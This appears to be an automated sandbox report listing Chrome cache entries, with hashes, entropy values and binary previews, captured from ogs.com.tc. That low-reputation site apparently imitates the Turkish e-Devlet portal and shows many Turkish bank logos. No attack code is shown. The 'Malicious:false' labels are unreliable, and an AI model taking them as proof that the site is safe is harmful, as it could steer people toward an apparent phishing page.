    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/
    Preview:<!DOCTYPE html>.<html lang="tr">.<head>. <meta charset="UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>M..teri Portal. | e-Devlet</title>. <link rel="stylesheet" href="assets/css/style.css">. <link rel="shortcut icon" href="assets/images/favicon-196x196.png" type="image/x-icon">. <style>. @media(max-width:768px) {. #basis main .methodSelector {. height: unset;. padding: unset;. }. .richText {. gap: 20px;. width: 100%;. display: grid;. grid-template-columns: repeat(2, 1fr);. justify-items: center;. }. .richText .box {. width: 100%;. }. . }. #basis main .referrerApp {. display: flex;. align-items: center;. flex-direction:

    Chrome Cache Entry: 120

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Web Open Font Format (Version 2), TrueType, length 35328, version 1.0
    Category:downloaded
    Size (bytes):35328
    Entropy (8bit):7.994332301165168
    Encrypted:true
    SSDEEP:768:ref/0cWmx/+kx+VzykFOgg80zBQd0Q8LdDY0NC+GJor:6McWmx/TIykFPctQdi0or
    MD5:7670DBA29AA2A1560C5D711EA6F6B369
    SHA1:6A2A620D2972F139C804C5A8363C91EB1A7595F6
    SHA-256:ADFA45260A1306CB5FEFC1F17C1B5E7B61135534A82BF1B8E3D0540AF7E07E3B
    SHA-512:CDA686C9E3AF62B9D13AF3C71F79184E4C57A06B8AF067316C70A5A56CB7A62C319E9F3B81DC57B58B052672126F2F019B32C687F05324D1C12F5664BCE9F7BA
    Malicious:false
    Reputation:low
    URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2
    Preview:wOF2...............\..............................@.....|?HVAR.D.`?STAT.$'...J+...|.../V.....\.i....0....6.$..,. ..~.........'.sp.V.m..^.R...C..U.1..z...@P.Q...g&.14.>m.Q.m...rG.[^"ji[o.bW"plhM....(:......D'%.G.D^=j.).1....8 .............n.2.....a...a_t..<.......mJe.k...Mer}!...2&RY.9.KB....3.L...k.Q.Y."..d.7r.F!_.Z...~\.$[....D..<...b^..4~.....3..#.o2.\k<...;D....m.....;.p.......E2j..5ptHK...9$K....l.>.3..i.....rc....nr...]i...l..%d.B.2.d..'.uwtw.qrk...wn.wo...nx<.....}...O..v..rk....cgu...].$.....9.D.{._..cJ)m..d`..<~6./i$...;...*B.../..`........7...R.yP....l.....x....OF.... ..&... b. ...w..o.V"..1.../....3..)V.$'.X...f#..0ic..[...%......{_O.=.M..=o....L.cv.6........F..9 M....5Y.N.0.4...g....b....k.^......&......?.....$.@.:.J.2..v:...>%..C...>f.4..3e.6..4.`I..D..B.Q.Ou..J._..M.."2...x;G.\}U.HlbG..D.'.p.....D.'.:..G..h`........I.H...-o...~W.j.....e.\.d..;...m.?.)q...7k.R.....y..(.IX.=r7....g........>v.f........'.....L%...:%ChZ|..[h>..dz.[.][@.

    Chrome Cache Entry: 121

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):4042
    Entropy (8bit):7.944757222253673
    Encrypted:false
    SSDEEP:48:s4M0dukGQY5v9g+Ca2TWLwk75UOlI6QEpWgDDwrYhwxf8wHG8umz00og2SBtKiCL:s4MW8vKFqLqX61pm8Au2H4iCGQ
    MD5:F188C8BDEC3EF94C06AAEF6EE7381867
    SHA1:36DD9ECD9ECCE60496899DCC092508D06ADD77DD
    SHA-256:80F27648BA9BCFE1F3E29EAA9EA2B0C87C815CAFAA0D708042D0EE926E295B14
    SHA-512:9EFD2C067F15AC9A8C543D8D056655CB5EC18A79F72CF1F7320A0AB14077EB5828AEE2295CAD560BD62ED59205211D959540E9692F406278181FD8205DFA4073
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/ykb.jpg
    Preview:RIFF....WEBPVP8 .....X...*....>I$.E..!...H(....p.X.....r..7{o....s......Q.........o0..^..`?_.e....~......w...u..........`...=6.t...........=......N.?t{S...~.~w.......;....._.\s ..G....T2..i.'.'.m.?..r.../._.C.Q...3.-...O..j.E.K.~}.{......../p^..{......../p^..{......../p^..{......../p^.......d....8j.$..3...~.4..}....".B.....9..tdQ.<.7.F.9.v*+Z^..O.9...M=.JqW..!w...]...*t.N..}..h\..>MN....h.c.oA....5s......^..=3...#...x.l6..."a?..!~.'.W.{...<..c.v...r*%m..cq~..c^... .......Os....nR.'..h.6..;........{.T...wC....J.i2.N.8`..J......y.v........!...u.N0(..MHF..x.7.N .Uw.<!...`!.....[0x.h..@+V"......0xg%z........A. .<.x...q........DCw..]>.9W..p^..{......../p^..{......../p^..{......../p^..{........).............B}.....?|.....:.....r]N#AP.G....|.^.z...F.......y.....u..lqj.M'.$..:...d.M.|.VXv.a1..v. M.-.b...)..h1...5.I.p.....6.L..g.t..Q.f....Q!L.$......n...W.IH.........6b.B......q.a.].R.....J4.....u1P.D...F\..P...."s.%c..`........n...:........]2 \.

    Chrome Cache Entry: 122

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):6232
    Entropy (8bit):7.9601543548667015
    Encrypted:false
    SSDEEP:96:e5cUySaDRnAHjREcke1qe0zapt0dTHv0UxWcgv3O6j+lp7LDSvwVt0Cj:McU05A9EckcREapWPgHqlpHjsC
    MD5:23F8245CA4B48852594FD42621DA538E
    SHA1:64CE65DD304712ACCA99110878FACF125CFC029B
    SHA-256:DC1AB0A4FBEF32DF24A561823E09CFD394CB1486BBCF4D5C74981FD74E039010
    SHA-512:83FE7186C65E72D10C80892FAEC68341525E376E6758261C34F31B395D89C85CA12033B2ECD6BAE583CFA9FA69EC055A8B88D594536C6B75F7CFA384AA82E568
    Malicious:false
    Reputation:low
    Preview:RIFFP...WEBPVP8 D...Pi...*....>I$.E..!.L..(....p...o.{J...m...4..<.....v.2..z......I....................u...yo~../.e...k.9..YC._...|(...9./..#{/.5...<..A...?.j.3?........_.?.?*..~.r*.O.........2>.{..,.......^....*...G.o......3..}=.W...O.......K...............7.A.*]."....$.R.9.U..y%..|.....(T...EU.d.IB.f.T.[K...../<..R..S.<,l$"....#.:..v..&....\sch...\.%.Avlb..h^.$.+.2....7o.....g.....!.<0kp.Z]..@1NbF........<.N.u.Qk',.#..3....aq.IHP...rM&..]....\sj........<...BM....u."!xs.^.V`>.."=RMe.U..t...%4R(.....9.q.S..m.h...p..Ii..p.{TNU.1c.M.'...Z..6!...........NC]..ERh~....c.U_....q...*.....A7.(....E...9..dM=n.7"...^z..6fb....u.t...M3...V...8..t .p.'.OM9,......:.q.Y...b.7......(3.....Y.u.Z....L~.EQxR.........y..h.6.E....<QB.J.3.O...i.,.........>_..W..*.`...y%..@.(....7..8#.^..7.5.U..y%..|.....(T...EU.d.IB..8r*.. .J....U_...P.........Ox.7..&.;W.g..^qcy.gU...e....D...K.1R~yn..L........Ik}....ij...Wq&=e.T+...M.>0M..3......V.....y..K..^.#......

    Chrome Cache Entry: 123

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 18:05:41], progressive, precision 8, 500x200, components 3
    Category:dropped
    Size (bytes):30853
    Entropy (8bit):7.553405232630665
    Encrypted:false
    SSDEEP:384:nX0d/iZ2X0un/SUveaq0A9O9R6QpxPETLFZitbM/0UQv/acp1sQoh0eY/aUjCRaJ:X0d/J0u8adL9Rpx88twMV/fVjC4
    MD5:086FF182D1CE8900789C915F40274FBA
    SHA1:8B3A467A19D3B3E1B014646B4D720570A44A129B
    SHA-256:CFE6B1FDC9E2AB8BBDA89190E3305A86866196D1B60BB3B3849D47CD5C89A3C6
    SHA-512:975293F2F2FE33D4A0E2CA64CB49078C057D692B021B8912792BDF841606323A3A2296F2F862DEE7BEE7BA836E808861A0DF23E34B62B80990E300504B72897A
    Malicious:false
    Reputation:low
    Preview:.....oExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 18:05:41........................................................................."...........*.(.....................2...........5.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)...m.6../y.h.......$..........-...qc.q}.........M.$Vd..l.._3..}...q.m....4.......f^e..z.6X.....

    Chrome Cache Entry: 124

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):4414
    Entropy (8bit):7.945095559581274
    Encrypted:false
    SSDEEP:96:YMZwRS+gvHuw7q1stqv9hCHvMd6c6gpilgoKwxUKr2/0C:YMGRS+gvHl7WsalDiObwuQ2Z
    MD5:D1306EE481D42E8B5C9BEDC7912750BD
    SHA1:69280F12C5A71880B049D64CCA44B99AACAF6DC3
    SHA-256:C005BB0A1E17FD46685CFFF945353975BDAC012D5F487BE9C3BFFE1C08F02FB0
    SHA-512:FD1E172442E1C782444ADF096D15BA00EB79DCEB9E994B6255EB245CEC8492A85ABD0B5D18EA5339A7A7EDAE18E06CBAAE0B79D4DC9F922574759E099698D383
    Malicious:false
    Reputation:low
    Preview:RIFF6...WEBPVP8 *....[...*....>I$.F".!!"2H.P..in.wa...\}K......i;..]:........`....z.y..S.O.../|.@....=`......~...?..........j....7d.......\.:.7........k...%...K.._........G....._..4..._.o.......?l.'...p.....~g... .o......~.~7?..C.;.3...........]._...............I.... .=R........................q.....'....3...3....._.1.....\.....:...._........p........bX<.!d.0_ sS..3..k.@....P.3p8/.....]I...v...........=_U...2..a.5...A.........B...U..{....\.hI]JD.....y..>.YKi".".:..JUV..f7.w......_E....?.Dk.......9........kz.4}.2_i...5.r<_...f.O.....+......q.Q.//...g.K+...$.f.Z..G.)....S....e.n.2...`....7..5....c....<.._.z...I?.P.T.5..."2.3..Y]..>.Y]..>.Yf"...,..i..,..i..,..i..,..i..,..i..,..i..,..i..,..i..,..i..,..i.........f.......-...'...f....G...............>k...<'.4...s.r!......>W..La.(V.....=I..0'.f...$p.]Q.....4-.._sg.+.V. .p..G(w_....%E.x.vX..O..Y.O&..%...I.R..N...e.[.......b...b1T|...7..._.e...,..j.L.79.|C............,..LsI...e

    Chrome Cache Entry: 125

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:27 19:59:58], progressive, precision 8, 500x200, components 3
    Category:downloaded
    Size (bytes):22502
    Entropy (8bit):7.2894603929109865
    Encrypted:false
    SSDEEP:384:v9/ioaLnh1bF8ICY2MkvRkiMbF4/EMnTMY7LTat:v9/SLDGICY2rvkhObr7K
    MD5:AC0CD030D45D9E6E66C084BDE8E550BC
    SHA1:DDCD46644E2F43B14A8D399106F697631A138B2C
    SHA-256:42AC0A069FB6314753F1FDD80C94DAEEB7E784FBC34661CA692C7885390A86B9
    SHA-512:0926E006155988284696401B05F217E961474F125D560E654E6687B2D2CC48FB5306992143EB94D5836FE495FBA0EB07FAE1375652DAE028F240173C9B886C29
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/teb.jpg
    Preview:.....SExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:27 19:59:58........................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$....I.7.}.no...R.&.....3.J]$.IJI$.R.I$...I%)$.IO...T.I%)$.IJ\..*.[u..........2\....'.................*..E...........T.......-.....n...

    Chrome Cache Entry: 126

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 18:05:41], progressive, precision 8, 500x200, components 3
    Category:downloaded
    Size (bytes):30853
    Entropy (8bit):7.553405232630665
    Encrypted:false
    SSDEEP:384:nX0d/iZ2X0un/SUveaq0A9O9R6QpxPETLFZitbM/0UQv/acp1sQoh0eY/aUjCRaJ:X0d/J0u8adL9Rpx88twMV/fVjC4
    MD5:086FF182D1CE8900789C915F40274FBA
    SHA1:8B3A467A19D3B3E1B014646B4D720570A44A129B
    SHA-256:CFE6B1FDC9E2AB8BBDA89190E3305A86866196D1B60BB3B3849D47CD5C89A3C6
    SHA-512:975293F2F2FE33D4A0E2CA64CB49078C057D692B021B8912792BDF841606323A3A2296F2F862DEE7BEE7BA836E808861A0DF23E34B62B80990E300504B72897A
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/sekerbank.jpg
    Preview:.....oExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 18:05:41........................................................................."...........*.(.....................2...........5.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)...m.6../y.h.......$..........-...qc.q}.........M.$Vd..l.._3..}...q.m....4.......f^e..z.6X.....

    Chrome Cache Entry: 127

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):5260
    Entropy (8bit):7.952632516709832
    Encrypted:false
    SSDEEP:96:f2l3QIpOaVksRO11Nhf/VwjCX9S2Ml8nWas3SWiy2p0itRx+67ndykjq3Wd4OFoX:Ol3QqVk8CNl/ajCIOtE0OMRx+6jdyixi
    MD5:810A4DE086E544A749CF1B43416178EE
    SHA1:A3102B2BB04886A9665207A1C70068D31F5BDA71
    SHA-256:1D2F039FDBEA8658D2D94F561BC21B0431EFAC371ADDDC47D81BB95B6B8BC4BD
    SHA-512:A6F5AFAE46D00702072FA68C69D2E67D09DAA0442AA0326474BB9AE4EA4CC17EBDCE66E1B6B10E2A18CE5B445E86A0550740F3B368A38308EF84C19DF86641E0
    Malicious:false
    Reputation:low
    Preview:RIFF....WEBPVP8 x...0_...*....>I$.E..!.y.p(....p.U.W..J..c.....m..U.]./...........m..........?..~..-...g._.....?..0...s=@.<............r....?.|..G...o.-......./._\.._.....................l.~..v.O._..e.}....~e.!.O..._....%...K..P............g..=..O...5...U...u..>.....z.}[......._...z.{ .V.PST.va...f.ec..h....(.....(....K.9`;*...MZ{...P.......@.....(....+s...M........,..._...j.Z.~.:..ks..,..(......=......M..CtB.v.j...8...]. Be....._.j.j.9...5.m.U......k..e^ .t..F5.)..)~u.i.qh.,.u._.H. .h..)..W.J.M.U'.....SV.R..PS@...m..g.#..'.....F9.a..c<...].(.....Tp.Ta..Ix.)-.:...]Fk}."..C-AMXQK.>?.V.".../.Z)..#8.....T.c.(..n..E.......q.L..xSV.R..PR..U.IB4.:l....I....@.O.;.Ej....:..u.Mc..s.d.d.T....R~u.)..)~u..d...@8..>..Z......Z......Z......Z......Z......Z...........~..K-.^3...Z,D`..{S.+C.$.H....<.m.5...p.:q...A......G...C.........w..OY.{2t..z...U.....$..L......lU..7.... ...U.Se...g@e..-g....~x+<.y...Fh.<d..EZ...b..h....L+S8SU...u.s...T......{jT..p...^.

    Chrome Cache Entry: 128

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text
    Category:downloaded
    Size (bytes):21852
    Entropy (8bit):5.505805631416707
    Encrypted:false
    SSDEEP:384:bvlLvAvFv2wvJvcvkla/U2PQDjlJQT2g/EOlIx+2BiNtlXid2yxuQlmjA2zkf/lw:bvJvAvFv5vJvcvkQ/UgQDj/QTP/EOixO
    MD5:90397E2DF1551F7F31B66E2759D8A50D
    SHA1:487D0B3D7562F9E4EFBCD8548E5C6EBD77A28EF8
    SHA-256:BD4BB9BD2A39844FA841D35AD0B27B3AEB1F625CC0D7763CAF1377D7D36D6FAE
    SHA-512:A2EC4624C366901CA6AE69B55DFFEA543F0C6227DA6925E4DF2161F1181C23AF7092B704611312DD8C07EEADC0F8413F02DFB38232FEA15E7BEAE9B91FAAA8DD
    Malicious:false
    Reputation:low
    URL:https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@100;200;300;400;500;600;700;800;900&display=swap
    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufA5qW54A.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufJ5qW54A.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufB5qW54A.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 100;. font-

    Chrome Cache Entry: 129

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):5268
    Entropy (8bit):7.94280823443583
    Encrypted:false
    SSDEEP:96:pd9cVC1HAbPq1GBgYmJbtt3I0yjjFvH7Oj61RdEv5fczq78cz21PQj:WVCJ12HmJp6tbS6bdExfAw24
    MD5:34CDE1A4D95782DC8A404F3B7A22707C
    SHA1:11ACDBECC2E820EA75A21EFC9D19C7F3EBB62631
    SHA-256:CF164D0F6DBDD0F6AA11BA954189B8DCF4CD07AD066083633986C176FC0019CD
    SHA-512:1194C6EE637E6530B64FB3C1C2D93FE76533F3A79648D43778EDD4CA5C0FDFB1E437A63CFA050D0E4986DE41A17F009766C409FA7A42C5BAE0A348778EB04BE6
    Malicious:false
    Reputation:low
    Preview:RIFF....WEBPVP8 ....0c...*....>I$.E..!.Z..(....p...o~.g.....~..|.<{....=......N..I.....c...3.....@....z.....u>................?..'./.o..%.v..2....?"........_{?..7.O._....~.........N.;...;..V...........'......e...[...._.=..1.....o.o._.?..........((.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.TZzLo&.X...&...AU...:...E........R.%P.M.`.._.....r..xZ..B.|..........).[..d.........e[...R.....u......5...J......+\.?..o0&.....RD....,s^4..}.?.-.\....TZzkF....S).x.&. ..K.P..(.#Y......*.-..{.r.......[. ...h........WF..........;..GJ..O.qSn..R,....b..&Q..@..=...Z.~uV'.Mp..;.#.jlE.^..,.2..Z.r.....!.............J.....p2......b./.N...n..?...B.)..d...Jb..2.!Yc56..9<d...gD..sa....3.ma.k.v.3.LR`-..q ...x&6......I...}..:...E..:...E..:...E..:...E..:...E..:...E..:...E..:...............t.....q... N..Q.v.A...:z..(.....zNS.o.!.7.......h-F.s..R~|...7.F._....?tP..+.....62.u.]y|.M..^.L$`2\{..!..{.....W......~..^.{\mY.,e^........;.W.p...a..*

    Chrome Cache Entry: 130

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):3510
    Entropy (8bit):7.923209159875537
    Encrypted:false
    SSDEEP:96:H/Dv4WxcN41DkQKrPidlfMhpziZcGnWyQ4Z5DOp1qoptEjm2NavQ:H/bOkhKrqr0P83Z56zpp2fcQ
    MD5:43C944FA568502BAEDCCE9455D812C3C
    SHA1:D9B1CFCAD1A4AF9CE14AF46B37D91DD8551AE9BC
    SHA-256:EE9DF8FAF35A0992E4DBFFC2DF4BB02FD6691184766D2915CF2E19BC4E906FE3
    SHA-512:C2CB9BFB37849BE3DEE22092BA08DC270A8F80070A2F55345D47CC209F4A71E25D1FAC83699D3016CF4A3EB271195A0FAD147D88E41CB955787B9F312A68413E
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/ziraat.jpg
    Preview:RIFF....WEBPVP8 .....R...*....>I$.F".!.!5..P..gn.v....K.O}..wgn:t.|.o._._.;H..~...................p....}.?Rz...?[}4.a...d.k...X~..P...._.?...............OS...z.....G._.|......G......Z.Xq.i.`^.|..'....M{......O..A.*..........?.~`>....../.....^... ?p.-@.z....U.A.....T...._..P...-~@U@.z....U.A.....T...._..P...-~"G.y.{-../?.......U.A.....S.m.I...`.Q.m..N......P5.@.1.H9..y7.~.9..9..(?W.......+o..ky.LK... z..v.).U.A..Y7.....'-..........A.B.z.r....z.6V)6,8........3...jR.j.c....CuW...5..'.p.....R.M....-~>.".............M[....Q...*.j..xh5."..:.+.9..[.g.!....\Q?WY.....Rv"...fK6a.......K_..P..S..s..#.5 .h.T...._..P...-~@U@.z....U.A.....T...._..P...-~@U@.z....U.A...................@L..mt....!..H-{....t._.P......}Es.m.{u......$.o.......M..H......;.p......{..H]..~X!.].nk+.O....}... ..C.....s?....F....XI.....+.y..2..-P>....2..wE.4..)75(..4....&...?...2.rI..WCw.I.1.....3.Q.t....t...F.........rWf.....Y;.~.'B4/."..(.K..........?..p:.....H.'......Ju..*p..i..]..)a

    Chrome Cache Entry: 131

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):4528
    Entropy (8bit):7.936942161113379
    Encrypted:false
    SSDEEP:96:eM0ww3WpqYkXJnPUlwdFKoN8FSz2gDi/8:eM0l3Wp7oJPgwdFdNeSzZDj
    MD5:7D37026130C2A0B269BD4F9C165FAD7F
    SHA1:F53514C0D1A2F644CB6DB4FFADF0167FEC4413BF
    SHA-256:008B64ADB48FE137B0210B3187450B8804FB291D5283E794E2EAE52E05D61720
    SHA-512:C8FA453082068ED27DFEFA878997B30D8420FD053C5F3616A36DC6B2824493D403662F92EFD64248E1F10F58225E41EEE60A420C6C6D40E3814DC800F16E55AA
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/turkiyefinans.jpg
    Preview:RIFF....WEBPVP8 ....0^...*....>I$.E..!...T(....p.T...y.U..~!.s....,.o..k>..@y.~..u...........7..P....z.=.?h=3.d~..l.......d....C.?..t~..[..LP~;.....f.#>..c.../.....w................o.>...{..(.g.c.w.o./........g.3....\.........+.............../.k.s..P....w.....w.....w.....w.....w.....w.....w.....w..e..5.r...;..r...;}.bo.>S........~.....F..p.I...;AT....+.M"Gz..uG..7W.n3..T.G1.....2..D.G..PI\.,..](./.!..z.T..D.....3.@....obLH\o....9..l.]b...#..e.}.S....2K..?c..........=ey.U.E.!._7u.....9D..eZ..'.:..\.6iE.^..m?T.......,..D..2=....%V.K....~...5.`....52..D<l...#..2...d.N..8.n.F....\..%..=.'.O~5.D..!..*...R.......U.....N....I...QjCV..`..._.1..IOb.yg~....F..Q.:..wJ....%....Uy..0..w...!...@wf....;..r...;..r...;..r...;..r...;..r...;..r...;p...............$.e....q..5O..M.nf.Ap."..8....l...7.....1....c..[...A4FD,.+.f..(....Of.Oj...&Y....5....{.^...)...i.<.F...r.A....y..%(.....4H.{|.%.A...T./.le. 9*..U|.B].......J...KE.s.....A....A..c..&..$..y.tL=.Z.Z

    Chrome Cache Entry: 77

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):5268
    Entropy (8bit):7.94280823443583
    Encrypted:false
    SSDEEP:96:pd9cVC1HAbPq1GBgYmJbtt3I0yjjFvH7Oj61RdEv5fczq78cz21PQj:WVCJ12HmJp6tbS6bdExfAw24
    MD5:34CDE1A4D95782DC8A404F3B7A22707C
    SHA1:11ACDBECC2E820EA75A21EFC9D19C7F3EBB62631
    SHA-256:CF164D0F6DBDD0F6AA11BA954189B8DCF4CD07AD066083633986C176FC0019CD
    SHA-512:1194C6EE637E6530B64FB3C1C2D93FE76533F3A79648D43778EDD4CA5C0FDFB1E437A63CFA050D0E4986DE41A17F009766C409FA7A42C5BAE0A348778EB04BE6
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/garanti.jpg
    Preview:RIFF....WEBPVP8 ....0c...*....>I$.E..!.Z..(....p...o~.g.....~..|.<{....=......N..I.....c...3.....@....z.....u>................?..'./.o..%.v..2....?"........_{?..7.O._....~.........N.;...;..V...........'......e...[...._.=..1.....o.o._.?..........((.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.TZzLo&.X...&...AU...:...E........R.%P.M.`.._.....r..xZ..B.|..........).[..d.........e[...R.....u......5...J......+\.?..o0&.....RD....,s^4..}.?.-.\....TZzkF....S).x.&. ..K.P..(.#Y......*.-..{.r.......[. ...h........WF..........;..GJ..O.qSn..R,....b..&Q..@..=...Z.~uV'.Mp..;.#.jlE.^..,.2..Z.r.....!.............J.....p2......b./.N...n..?...B.)..d...Jb..2.!Yc56..9<d...gD..sa....3.ma.k.v.3.LR`-..q ...x&6......I...}..:...E..:...E..:...E..:...E..:...E..:...E..:...E..:...............t.....q... N..Q.v.A...:z..(.....zNS.o.!.7.......h-F.s..R~|...7.F._....?tP..+.....62.u.]y|.M..^.L$`2\{..!..{.....W......~..^.{\mY.,e^........;.W.p...a..*

    Chrome Cache Entry: 78

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):5260
    Entropy (8bit):7.952632516709832
    Encrypted:false
    SSDEEP:96:f2l3QIpOaVksRO11Nhf/VwjCX9S2Ml8nWas3SWiy2p0itRx+67ndykjq3Wd4OFoX:Ol3QqVk8CNl/ajCIOtE0OMRx+6jdyixi
    MD5:810A4DE086E544A749CF1B43416178EE
    SHA1:A3102B2BB04886A9665207A1C70068D31F5BDA71
    SHA-256:1D2F039FDBEA8658D2D94F561BC21B0431EFAC371ADDDC47D81BB95B6B8BC4BD
    SHA-512:A6F5AFAE46D00702072FA68C69D2E67D09DAA0442AA0326474BB9AE4EA4CC17EBDCE66E1B6B10E2A18CE5B445E86A0550740F3B368A38308EF84C19DF86641E0
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/ptt.jpg
    Preview:RIFF....WEBPVP8 x...0_...*....>I$.E..!.y.p(....p.U.W..J..c.....m..U.]./...........m..........?..~..-...g._.....?..0...s=@.<............r....?.|..G...o.-......./._\.._.....................l.~..v.O._..e.}....~e.!.O..._....%...K..P............g..=..O...5...U...u..>.....z.}[......._...z.{ .V.PST.va...f.ec..h....(.....(....K.9`;*...MZ{...P.......@.....(....+s...M........,..._...j.Z.~.:..ks..,..(......=......M..CtB.v.j...8...]. Be....._.j.j.9...5.m.U......k..e^ .t..F5.)..)~u.i.qh.,.u._.H. .h..)..W.J.M.U'.....SV.R..PS@...m..g.#..'.....F9.a..c<...].(.....Tp.Ta..Ix.)-.:...]Fk}."..C-AMXQK.>?.V.".../.Z)..#8.....T.c.(..n..E.......q.L..xSV.R..PR..U.IB4.:l....I....@.O.;.Ej....:..u.Mc..s.d.d.T....R~u.)..)~u..d...@8..>..Z......Z......Z......Z......Z......Z...........~..K-.^3...Z,D`..{S.+C.$.H....<.m.5...p.:q...A......G...C.........w..OY.{2t..z...U.....$..L......lU..7.... ...U.Se...g@e..-g....~x+<.y...Fh.<d..EZ...b..h....L+S8SU...u.s...T......{jT..p...^.

    Chrome Cache Entry: 79

    Download File
